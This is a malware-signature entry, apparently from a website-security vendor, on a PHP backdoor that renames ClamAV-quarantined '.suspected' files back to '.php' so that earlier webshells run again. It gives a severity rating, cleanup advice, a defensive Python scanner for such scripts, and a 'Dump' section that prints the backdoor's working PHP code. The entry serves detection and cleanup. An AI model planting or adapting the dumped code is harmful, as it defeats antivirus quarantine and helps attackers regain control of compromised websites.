
A backdoor that renames files quarantined by ClamAV with the .suspected extension back to .php, re-enabling previously uploaded malicious files or any left over from an earlier attack. The attacker uses it to try to regain control of an infected website where he has uploaded malicious files before.

Severity

MEDIUM

Affecting

This malicious code affects any vulnerable or compromised website that is configured to interpret the script language.

Cleanup

Inspect your site's files, especially theme-related ones, for code you don't recognize. Look for any encoded or obfuscated PHP code.
Also, you can sign up with us and let our team remove the malware for you.
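
One way to automate the inspection step above, as an added example that is not part of the original page or the vendor's tooling: it walks a site tree, lists files still carrying the .suspected suffix, and flags PHP files that quote that suffix and also call rename(). The heuristic, the extension list and the sample tree are assumptions of this example.

```python
import re
import tempfile
from pathlib import Path

# Heuristic assumed by this example (not a vendor signature): a PHP file that
# quotes the ".suspected" suffix and also calls rename() needs manual review.
SUFFIX_RE = re.compile(rb"""['"]\.suspected['"]""")
RENAME_RE = re.compile(rb"\brename\s*\(", re.IGNORECASE)
PHP_EXTS = {".php", ".phtml", ".inc"}


def looks_like_reverser(path):
    """True if the file quotes the '.suspected' suffix and calls rename()."""
    try:
        with open(path, "rb") as fh:
            data = fh.read(1_000_000)  # cap the read for very large files
    except OSError:
        return False  # unreadable: skip rather than abort the scan
    return bool(SUFFIX_RE.search(data) and RENAME_RE.search(data))


def scan_tree(root):
    """Return (candidate_scripts, quarantined_files) as sorted relative paths."""
    candidates, quarantined = [], []
    for path in (p for p in Path(root).rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        if path.suffix == ".suspected":
            quarantined.append(rel)  # still quarantined: keep an inventory
        elif path.suffix.lower() in PHP_EXTS and looks_like_reverser(path):
            candidates.append(rel)
    return sorted(candidates), sorted(quarantined)


def build_sample_site():
    """Create a constructed sample tree; file contents are inert placeholders."""
    root = Path(tempfile.mkdtemp(prefix="site-"))
    samples = {
        "themes/t/fix.php": "<?php $n = str_replace('.suspected', '', $f); rename($f, $n);",
        "uploads/old.php.suspected": "quarantined placeholder",
        "lib/move.php": "<?php rename('a.txt', 'b.txt');",
    }
    for rel, body in samples.items():
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_text(body)
    return root


if __name__ == "__main__":
    print(scan_tree(build_sample_site()))
```

Comparing the quarantined list between runs shows when a .suspected file has disappeared, which is the visible effect of this backdoor having executed.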

Dump

set_time_limit(0);
ignore_user_abort();

$dir = scandir("..");

foreach ($dir as $dirr)
{
    if (strpos($dirr, ".suspected"))
    {
        $newdirr = str_replace(".suspected", "", $dirr);
        rename("../".$dirr, "../".$newdirr);
    }
}